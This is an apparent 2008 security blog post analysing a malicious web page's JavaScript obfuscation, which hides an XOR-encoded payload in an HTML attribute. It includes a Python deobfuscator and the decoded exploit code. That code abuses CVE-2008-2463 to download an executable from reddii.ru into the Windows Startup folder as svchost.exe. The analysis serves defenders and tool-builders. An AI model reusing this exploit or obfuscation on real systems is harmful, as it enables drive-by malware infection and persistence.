October 15, 2008
A few weeks ago, the good folks of Malware Domain List pointed out an interesting new obfuscation technique being used by some malicious JavaScript samples.
Here's the code of the malicious page (from reddii.ru):
<html><body><input type='text'style='display:none'id='vimamikolu2'
value='kekin1=new Array(161,244,251,239,252,240,248,189,238,239,254,
...
166,144,151,161,178,238,254,239,244,237,233,163);'/>
<script>votot=function(str){document.write(str);};
dotemerape7=new String();
lifum=Math.round(-80.131*Math.SQRT1_2-16.601*Math.LOG2E+342.801*Math.LN2);
eval(document.getElementById('vimamikolu2').value);
for(pidum9=0;pidum9<1577;pidum9++)
dotemerape7+=String.fromCharCode(kekin1[pidum9]^lifum);
votot(dotemerape7);
</script></body></html>
As is typical, this code is just the decoding routine for the actual exploit code, which is obfuscated. In this case, however, the obfuscated code is stored in, and dynamically retrieved from, the HTML surrounding the JavaScript. More precisely, the decoding routine reads the value attribute of the HTML element whose id is vimamikolu2. That string is passed to eval, which defines the array kekin1. The code then applies String.fromCharCode to each element of the array (XORed with a constant value) and writes the result back to the page.
While not particularly difficult to reverse manually, this technique has an important consequence for deobfuscation and analysis tools: they need a reasonably faithful implementation of the DOM (e.g., they must understand getElementById) in order to get around this kind of trick automatically. Incidentally, I'm working on one such tool (which handles this sample just fine) and should have something ready (and releasable) soon: check back!
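To make the "needs a DOM" point concrete, here is an added example in Python; it is not the author's tool and not code from the original page. It emulates only the browser features this decoder touches: looking an element up by id and reading its value attribute, the JavaScript Math constants behind the XOR key, and String.fromCharCode. The array literal is parsed out of the attribute rather than eval()ed, and the key expression is evaluated by a small ast-based allow-list evaluator rather than by eval, since both strings come from a hostile page. The names MiniDOM, js_math_eval, deobfuscate and SAMPLE_PAGE are this example's own, and SAMPLE_PAGE is a constructed page that reuses the post's layout and key formula but encodes a harmless string (the real array is elided in the post). As a check against the post: its key expression evaluates to 157, so the first array element, 161, decodes to 60, the character '<'.

```python
import ast
import math
import re
from html.parser import HTMLParser

# JavaScript Math constants (the same IEEE-754 doubles the browser computes with).
JS_MATH_CONSTS = {"E": math.e, "PI": math.pi, "LN2": math.log(2), "LOG2E": 1 / math.log(2),
                  "SQRT1_2": math.sqrt(0.5), "SQRT2": math.sqrt(2)}
# JavaScript Math.round rounds .5 towards +infinity, unlike Python's round().
JS_MATH_FUNCS = {"round": lambda x: math.floor(x + 0.5), "floor": math.floor, "ceil": math.ceil}
_BINOPS = {ast.Add: lambda a, b: a + b, ast.Sub: lambda a, b: a - b,
           ast.Mult: lambda a, b: a * b, ast.Div: lambda a, b: a / b}


def js_math_eval(expr: str) -> float:
    """Evaluate a JS arithmetic expression over numbers and Math.* members by
    walking its AST against an allow-list; the text is hostile, so no eval()."""
    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.Name) and node.id in JS_MATH_CONSTS:
            return JS_MATH_CONSTS[node.id]
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, (ast.USub, ast.UAdd)):
            return walk(node.operand) * (-1 if isinstance(node.op, ast.USub) else 1)
        if isinstance(node, ast.BinOp) and type(node.op) in _BINOPS:
            return _BINOPS[type(node.op)](walk(node.left), walk(node.right))
        if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                and node.func.id in JS_MATH_FUNCS and len(node.args) == 1):
            return JS_MATH_FUNCS[node.func.id](walk(node.args[0]))
        raise ValueError("unsupported construct: " + ast.dump(node))
    return walk(ast.parse(expr.replace("Math.", ""), mode="eval"))


class MiniDOM(HTMLParser):
    """Just enough DOM: elements indexed by id, plus the text of each <script>."""
    def __init__(self):
        super().__init__()
        self.by_id, self.scripts, self._in_script = {}, [], False

    def handle_starttag(self, tag, attrs):
        attr_map = {name: (value or "") for name, value in attrs}
        if "id" in attr_map:
            self.by_id[attr_map["id"]] = attr_map
        if tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data


# The script idioms this decoder relies on (narrow on purpose).
ID_LOOKUP = re.compile(r"document\.getElementById\(['\"]([^'\"]+)['\"]\)\.value")
ARRAY_DEF = re.compile(r"(\w+)\s*=\s*new\s+Array\(([\d\s,]*)\)")
CONST_DEF = re.compile(r"(\w+)\s*=\s*(Math\.[^;]+);")
XOR_DECODE = re.compile(r"String\.fromCharCode\((\w+)\[\w+\]\s*\^\s*(\w+)\)")


def deobfuscate(page_html: str) -> str:
    """Return the string the decoder would document.write() into the page."""
    dom = MiniDOM()
    dom.feed(page_html)
    dom.close()
    script = "\n".join(dom.scripts)
    # Resolve getElementById(...).value and parse the array literal out of the attribute.
    arrays = {}
    for element_id in ID_LOOKUP.findall(script):
        element = dom.by_id.get(element_id)
        if element is None:
            raise ValueError("script references unknown id " + element_id)
        for name, body in ARRAY_DEF.findall(element.get("value", "")):
            arrays[name] = [int(n) for n in body.split(",") if n.strip()]
    # Compute the XOR key from its Math.* expression, then replay the fromCharCode loop.
    consts = {name: js_math_eval(expr) for name, expr in CONST_DEF.findall(script)}
    match = XOR_DECODE.search(script)
    if match is None:
        raise ValueError("no fromCharCode/XOR decode loop found")
    values, key = arrays[match.group(1)], int(consts[match.group(2)])
    return "".join(chr(v ^ key) for v in values)


# Constructed sample: the post's page layout and key formula, but the array
# encodes the harmless string "<b>ok</b>" (key 157, so '<' is stored as 161).
SAMPLE_PAGE = (
    "<html><body><input type='text'style='display:none'id='vimamikolu2'\n"
    "value='kekin1=new Array(161,255,163,242,246,161,178,255,163);'/>\n"
    "<script>votot=function(str){document.write(str);};dotemerape7=new String();\n"
    "lifum=Math.round(-80.131*Math.SQRT1_2-16.601*Math.LOG2E+342.801*Math.LN2);\n"
    "eval(document.getElementById('vimamikolu2').value);\n"
    "for(pidum9=0;pidum9<9;pidum9++)dotemerape7+=String.fromCharCode(kekin1[pidum9]^lifum);\n"
    "votot(dotemerape7);</script></body></html>"
)
```

Calling deobfuscate(SAMPLE_PAGE) returns "<b>ok</b>", and js_math_eval on the post's key expression returns 157. The deliberate limitation is that this emulates only the idioms this one sample uses, with regexes standing in for a JavaScript engine; a general tool needs a real interpreter with a DOM behind it, which is exactly why the trick above defeats simple string-level deobfuscators.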
The deobfuscated code reveals the usual exploit for the MDAC vulnerability and a more interesting (and recent) exploit for the Office Snapshot Viewer vulnerability (CVE-2008-2463):
function goMDAC() {
...
}
function goPDF() {
wnd=window;
while (wnd.parent!=wnd)
wnd=wnd.parent;
wnd.location="getfile.php?f=vispdf";
}
function goSnap() {
var sfrom = 'http://reddii.ru/traffic/sploit1/getexe.php?h=12';
var sto = 'c:/Documents and Settings/All Users/Start Menu/Programs/Startup/'
+'svchost.exe';
try {
snapattack.SnapshotPath = sfrom;
snapattack.CompressedPath = sto;
snapattack.PrintSnapshot(sfrom,sto);
} catch(e) {}
}
setTimeout('goMDAC();',3500);
setTimeout('goPDF();',5000);
goSnap();
Another interesting aspect of this exploit is that it (also) tries to download PDF files. But this is material for another post...